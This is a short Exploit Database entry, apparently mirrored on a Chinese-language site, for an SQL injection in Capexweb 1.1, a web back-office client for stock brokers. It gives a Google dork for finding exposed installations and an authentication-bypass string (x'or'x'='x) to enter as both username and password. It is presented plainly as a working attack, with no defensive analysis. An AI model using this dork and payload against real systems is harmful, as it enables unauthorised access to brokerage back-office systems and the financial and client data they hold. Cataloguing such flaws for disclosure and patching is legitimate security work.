Capexweb 1.1 – SQL Injection

• Exploit Database
• 15 阅读

• 作者： D1rt3 Dud3
  日期： 2011-12-16
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/18247/

• # Exploit Title: Capexweb Sql Vulnerable
  # Date: 15 Dec 2011
  # Author: D1rt3 Dud3
  # Google Dork: inurl:capexweb
  # Gr33ts: Th3 RDX
  # Version: 1.1
  # Description: Capexweb is Web based Backoffice client used by leading Stock Exchanges like Berkeley Gains, angle broking house etc.
  
  http://localhost:8080/capexweb/capexweb/
  
  
  Log in details:
  Username: x'or'x'='x
  Password: x'or'x'='x
  
  -------------------------------------------------------------------------------"Indian"